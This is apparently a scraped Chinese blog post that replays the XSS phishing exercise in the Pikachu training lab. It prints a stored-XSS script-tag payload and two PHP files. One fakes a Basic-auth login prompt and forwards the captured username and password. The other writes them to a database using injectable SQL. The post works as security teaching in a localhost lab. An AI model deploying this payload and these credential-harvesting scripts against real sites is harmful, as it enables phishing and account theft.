当前位置: 首页 > news >正文

1、pikachu靶场之xss钓鱼复现

一、复现过程

1、payload

<script src="http://127.0.0.1/pkxss/xfish/fish.php"></script>

将这段代码插入到含有储存xss的网页上,如下留言板

2、此时恶意代码已经存入数据库,并存在网页中,当另一个用户打开这个网页时,就会触发xss恶意代码,被跳转的另一个页面,并弹出登入框

3、这个时候如果输入账号密码,就会被恶意构造的后台窃取储存

二、分析流程

1、fish.php:文件源码分析,这是恶意构造的页面,即恶意插入xss代码中的url:127.0.0.1/pkxss/xfish/fish.php

即复现步骤2的恶意构造登入页面的源码

这是一个basic认证,你输入账号密码时会将这些信息记录并重定向到http://127.0.0.1/pkxss/xfish/xfish.php?页面

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的infoheader('Content-type:text/html;charset=utf-8');header("WWW-Authenticate: Basic realm='认证'");header('HTTP/1.0 401 Unauthorized');echo 'Authorization Required.';exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IPheader("Location: http://127.0.0.1/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}");
}?>

2、xfish.php:他会获取到传入过来的账号密,并将这些存入数据库

<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();if(!empty($_GET['username']) && !empty($_GET['password'])){$username=$_GET['username'];$password=$_GET['password'];$referer="";$referer.=$_SERVER['HTTP_REFERER'];$time=date('Y-m-d g:i:s');$query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";$result=mysqli_query($link, $query);
}?>

总结:

1、在含有xss漏洞页面,插入一个一个恶意script代码,代码会触发跳转页到恶意页面

http://www.lryc.cn/news/355798.html

相关文章:

  • 弘君资本炒股技巧:股票定向增发是什么意思?是好是坏?
  • vue3项目使用pinia状态管理器----通俗易懂
  • 零基础学Java第二十五天之Lambda表达式
  • VSCode配置Lua5.4安装
  • CI/CD:持续集成/持续部署
  • ComfyUI工作流网站
  • 【机器学习】机器学习基础概念与初步探索
  • 学英语材料:单口喜剧、讲故事、短剧喜剧以及广播剧和播客节目
  • Docker Compose使用
  • 如何优雅的卸载linux上的todesk
  • 【Vue】el-checkbox多选框实现单选效果,选中一个选项则自动取消其他勾选
  • Linux中使用vi编辑器自动缩进4个字符
  • #笔记#笔记#其他
  • gtask笔记
  • 【Linux学习】深入探索进程等待与进程退出码和退出信号
  • Linux:线程
  • 卡到BUG了:删除重发白得积分(以前删除会扣减积分)
  • 轻松拿捏C语言——【字符函数】字符分类函数、字符转换函数
  • 【Rust日报】ratatui版本更新
  • 力扣每日一题 5/28
  • async函数和await函数
  • Redis面试题深度解析
  • Ubuntu 22.04 .NET8 程序 环境安装和运行
  • MetaRTC-ffmpeg arm移植
  • 【乐吾乐3D可视化组态编辑器】模型类型与属性
  • PyQt下拉框QComboBox点击下拉时即更新下拉数据
  • 网上有哪些正规的兼职副业赚钱平台?分享10类正规的网上兼职赚钱平台,让你在家也能赚钱~
  • Spring:JWT
  • Python的selenium爬取
  • Linux--进程间通信(1)(匿名管道)